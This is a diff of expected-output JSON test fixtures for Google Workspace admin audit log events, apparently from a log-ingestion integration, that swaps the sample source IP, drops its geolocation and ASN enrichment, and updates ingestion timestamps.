@@ -1345,35 +1057,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091203800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915832800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_ALLOW_ADMIN_PASSWORD_RESET", "id": "1", @@ -1404,7 +1098,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1428,35 +1122,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091206500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", + "ingested": "2021-12-09T13:38:31.915838700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", "provider": "admin", "action": "ENABLE_API_ACCESS", "id": "1", @@ -1487,7 +1163,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1511,35 +1187,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091209200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", + "ingested": "2021-12-09T13:38:31.915844500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", "provider": "admin", "action": "AUTHORIZE_API_CLIENT_ACCESS", "id": "1", @@ -1569,7 +1227,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1593,35 +1251,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091211900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", + "ingested": "2021-12-09T13:38:31.915850200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", "provider": "admin", "action": "REMOVE_API_CLIENT_ACCESS", "id": "1", @@ -1651,7 +1291,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1675,35 +1315,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091214600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", + "ingested": "2021-12-09T13:38:31.915855800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", "provider": "admin", "action": "CHROME_LICENSES_REDEEMED", "id": "1", 
@@ -1733,7 +1355,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1757,35 +1379,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091217300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915861500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_AUTO_ADD_NEW_SERVICE", "id": "1", @@ -1815,7 +1419,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1839,35 +1443,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091220200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915867400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "CHANGE_PRIMARY_DOMAIN", "id": "1", @@ -1897,7 +1483,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1921,35 +1507,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091223100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915873300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_WHITELIST_SETTING", "id": "1", @@ -1980,7 +1548,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2004,35 +1572,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091225800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915879100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "COMMUNICATION_PREFERENCES_SETTING_CHANGE", "id": "1", 
@@ -2063,7 +1613,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2087,35 +1637,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091228600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915884800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_CONFLICT_ACCOUNT_ACTION", "id": "1", 
@@ -2145,7 +1677,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2169,35 +1701,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091268Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915890600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_FEEDBACK_SOLICITATION", "id": "1", 
@@ -2228,7 +1742,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2252,35 +1766,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091274100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915896400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_CONTACT_SHARING", "id": "1", @@ -2311,7 +1807,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2335,35 +1831,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091277600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", + "ingested": "2021-12-09T13:38:31.915900600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "CREATE_PLAY_FOR_WORK_TOKEN", "id": "1", @@ -2393,7 +1871,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2417,35 +1895,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091280700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915905300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_USE_CUSTOM_LOGO", "id": "1", @@ -2476,7 +1936,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, 